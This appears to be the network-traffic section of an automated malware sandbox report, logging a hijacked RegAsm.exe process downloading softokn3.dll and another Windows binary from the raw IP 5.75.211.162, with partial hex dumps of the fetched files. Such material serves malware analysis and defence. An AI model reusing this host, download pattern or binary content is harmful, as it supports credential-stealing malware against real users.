                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:47 UTC262INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:47 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 450024
                                                                                                      Connection: close
                                                                                                      Last-Modified: Thursday, 26-Sep-2024 17:05:47 GMT
                                                                                                      Cache-Control: no-store, no-cache
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-09-26 17:05:47 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                      2024-09-26 17:05:47 UTC16384INData Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d
                                                                                                      Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
                                                                                                      2024-09-26 17:05:48 UTC16384INData Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff
                                                                                                      Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                      2024-09-26 17:05:48 UTC16384INData Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45
                                                                                                      Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                                      2024-09-26 17:05:48 UTC16384INData Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b
                                                                                                      Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                      2024-09-26 17:05:48 UTC16384INData Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc
                                                                                                      Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                                      2024-09-26 17:05:48 UTC16384INData Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01
                                                                                                      Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                                      2024-09-26 17:05:48 UTC16384INData Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8
                                                                                                      Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                                      2024-09-26 17:05:48 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c
                                                                                                      Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|
                                                                                                      2024-09-26 17:05:48 UTC16384INData Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83
                                                                                                      Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.5497295.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:49 UTC197OUTGET /softokn3.dll HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:49 UTC262INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:49 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 257872
                                                                                                      Connection: close
                                                                                                      Last-Modified: Thursday, 26-Sep-2024 17:05:49 GMT
                                                                                                      Cache-Control: no-store, no-cache
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-09-26 17:05:49 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                      2024-09-26 17:05:49 UTC16384INData Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89
                                                                                                      Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                                      2024-09-26 17:05:49 UTC16384INData Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8
                                                                                                      Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                                      2024-09-26 17:05:49 UTC16384INData Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00
                                                                                                      Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                      2024-09-26 17:05:49 UTC16384INData Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23
                                                                                                      Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                                      2024-09-26 17:05:49 UTC16384INData Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00
                                                                                                      Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                                      2024-09-26 17:05:49 UTC16384INData Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00
                                                                                                      Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                      2024-09-26 17:05:49 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                                      Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                      2024-09-26 17:05:49 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                                      Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                      2024-09-26 17:05:49 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                                      Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      15192.168.2.5497305.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
